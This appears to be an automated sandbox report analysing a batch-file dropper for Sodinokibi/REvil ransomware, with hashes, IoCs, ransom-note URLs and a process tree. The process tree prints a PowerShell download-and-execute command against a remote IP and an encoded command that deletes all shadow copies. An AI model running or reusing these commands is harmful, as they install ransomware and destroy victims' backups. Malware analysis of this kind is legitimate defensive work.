Analysis

- max time kernel: 146s
- max time network: 153s
- platform: windows7_x64
- resource: win7v200217
- submitted: 16-03-2020 15:10

Static task: static1

Behavioral task: behavioral1
  Sample: ePwu3qhG.bat
  Resource: win7v200217

Behavioral task: behavioral2
  Sample: ePwu3qhG.bat
  Resource: win10v200217
General

- Target: ePwu3qhG.bat
- Size: 195B
- MD5: aaa7b25a5b6939e0c9f77a1d8c141ff1
- SHA1: 9a68e6ebd88ee65a64c80eabd25057e8b1f7a0c3
- SHA256: d03a1ed079e497d770b0661e81fe675fe379107ec06f75ce916466d2026b9310
- SHA512: bc6ac64ddfeeed68bb844d913716f47f951b488d2a509993e73202577b72b129d4c725baeb5fc5bf191c97a4cb8b90d319ed23b8c9056eeb9d9d5d34acd0976e
Malware Config

Extracted from: http://185.103.242.78/pastes/ePwu3qhG

Extracted from: C:\v65g0-readme.txt
  Family: sodinokibi
  URLs in ransom note:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D19FCC29AFE4E52C
  - http://decryptor.cc/D19FCC29AFE4E52C
Signatures

Drops file in System32 directory (1 IoC)
  powershell.exe: File opened for modification C:\Windows\System32\CatRoot2\dberr.txt

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  powershell.exe (PID 1880)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  powershell.exe (PID 1880): Token: SeDebugPrivilege
  powershell.exe (PID 1880): Token: SeDebugPrivilege
  powershell.exe (PID 1996): Token: SeDebugPrivilege
  vssvc.exe (PID 1500): Token: SeBackupPrivilege
  vssvc.exe (PID 1500): Token: SeRestorePrivilege
  vssvc.exe (PID 1500): Token: SeAuditPrivilege
Blacklisted process makes network request (83 IoCs)
  powershell.exe (PID 1880); all flows attributed to this process, per-flow list omitted
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\yd3i540fab9h6.bmp"
Modifies system certificate store (4 IoCs)
  powershell.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  powershell.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary certificate blob omitted)
  powershell.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
  powershell.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (binary certificate blob omitted)
Suspicious use of WriteProcessMemory (5 IoCs)
  PID 1856 (cmd.exe) wrote to memory of PID 1880 (powershell.exe)
  PID 1880 (powershell.exe) wrote to memory of PID 1996 (powershell.exe), repeated 4 times
Suspicious behavior: EnumeratesProcesses (5 IoCs)
  powershell.exe (PID 1880), 3 entries
  powershell.exe (PID 1996), 2 entries
Discovering connected drives (3 TTPs, 7 IoCs)
  cmd.exe: File opened (read-only) \??\C:
  powershell.exe: File opened (read-only) \??\C:
  powershell.exe: File opened (read-only) \??\A:
  powershell.exe: File opened (read-only) \??\F:
  powershell.exe: File opened (read-only) \??\C:
  powershell.exe: File opened (read-only) \??\B:
  powershell.exe: File opened (read-only) \??\E:
Modifies service (2 TTPs, 4 IoCs)
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Drops file in Program Files directory (19 IoCs)
  powershell.exe: File opened for modification \??\c:\program files\ConvertToFormat.ini
  powershell.exe: File opened for modification \??\c:\program files\EditRepair.mpv2
  powershell.exe: File created \??\c:\program files\microsoft sql server compact edition\v65g0-readme.txt
  powershell.exe: File opened for modification \??\c:\program files\SkipApprove.xhtml
  powershell.exe: File opened for modification \??\c:\program files\UnpublishSync.aifc
  powershell.exe: File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\v65g0-readme.txt
  powershell.exe: File opened for modification \??\c:\program files\ExpandProtect.ods
  powershell.exe: File opened for modification \??\c:\program files\GrantOpen.inf
  powershell.exe: File opened for modification \??\c:\program files\LockBackup.au
  powershell.exe: File opened for modification \??\c:\program files\MoveWait.tif
  powershell.exe: File opened for modification \??\c:\program files\RestartSave.xltm
  powershell.exe: File created \??\c:\program files (x86)\v65g0-readme.txt
  powershell.exe: File opened for modification \??\c:\program files\SplitRestart.bmp
  powershell.exe: File created \??\c:\program files\microsoft sql server compact edition\v3.5\v65g0-readme.txt
  powershell.exe: File created \??\c:\program files\v65g0-readme.txt
  powershell.exe: File opened for modification \??\c:\program files\DisableCopy.M2T
  powershell.exe: File opened for modification \??\c:\program files\RestartUninstall.midi
  powershell.exe: File opened for modification \??\c:\program files\SuspendGrant.m4a
  powershell.exe: File opened for modification \??\c:\program files\UnpublishConvertTo.rmi
Processes

C:\Windows\system32\cmd.exe (PID 1856, depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\ePwu3qhG.bat"
  - Suspicious use of WriteProcessMemory
  - Discovering connected drives

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1880, depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ePwu3qhG');Invoke-HKEJEPZNRMGY;Start-Sleep -s 10000"
    - Drops file in System32 directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Discovering connected drives
    - Drops file in Program Files directory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1996, depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 of a UTF-16LE string; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} )
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Discovering connected drives

C:\Windows\system32\vssvc.exe (PID 1500, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service